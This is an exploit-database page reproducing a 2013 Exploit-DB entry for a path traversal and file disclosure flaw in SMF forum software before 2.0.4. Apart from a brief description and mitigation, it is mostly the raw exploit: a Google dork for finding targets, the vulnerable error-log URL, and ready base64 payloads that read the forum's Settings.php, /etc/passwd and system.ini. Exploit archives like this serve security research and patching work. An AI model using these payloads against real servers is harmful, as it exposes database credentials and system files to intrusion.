header-logo
Suggest Exploit
vendor:
SMF
by:
NightlyDev
7,5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: SMF
Affected Version From: 2.0.x
Affected Version To: 2.0.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 6.2
2013

SMF < 2.0.4 File Disclosure/Path Traversal

This exploit allows an attacker to access sensitive files on the server, such as configuration files, by using a base64 encoded file path. The attacker needs the 'admin_forum' privilege to exploit this vulnerability.

Mitigation:

Ensure that the 'admin_forum' privilege is not given to any user that should not have access to sensitive files. Additionally, upgrade to SMF version 2.0.4 or later.
Source

Exploit-DB raw data:

# Exploit Title: SMF < 2.0.4 File Disclosure/Path Traversal
# Google Dork: "Powered by SMF 2.0.x"
# Date: 02/02/2013
# Exploit Author: NightlyDev
# Software Link: http://download.simplemachines.org/index.php?thanks;filename=smf_2-0-3_install.zip
# Version: 2.0.x < 2.0.4
# Tested on: CentOS 6.2

 _   _ _       _     _   _        _____          _               
| \ | (_)     | |   | | | |      / ____|        | |              
|  \| |_  __ _| |__ | |_| |_   _| |     ___   __| | ___ _ __ ___ 
| . ` | |/ _` | '_ \| __| | | | | |    / _ \ / _` |/ _ \ '__/ __|
| |\  | | (_| | | | | |_| | |_| | |___| (_) | (_| |  __/ |  \__ \
|_| \_|_|\__, |_| |_|\__|_|\__, |\_____\___/ \__,_|\___|_|  |___/
          __/ |             __/ |                                
         |___/             |___/                                 
		 

You need the "admin_forum" privilege for this exploit.

http://<server>/index.php?action=admin;area=logs;sa=errorlog;file=[BASE64 ENCODED FILE PATH];line=[LINE NUMBER]

Example :

/srv/www/smf/Settings.php : L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA= 

/etc/passwd : L2V0Yy9wYXNzd2Q=


SMF Configuration File Disclosure : 

file=L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA=;line=40

/etc/passwd File : 

file=L2V0Yy9wYXNzd2Q=;line=1

C:\Windows\system.ini

file=QzpcV2luZG93c1xzeXN0ZW0uaW5p;line=1


NightlyDev.

Navigation

Suggest Exploit

Services By CQR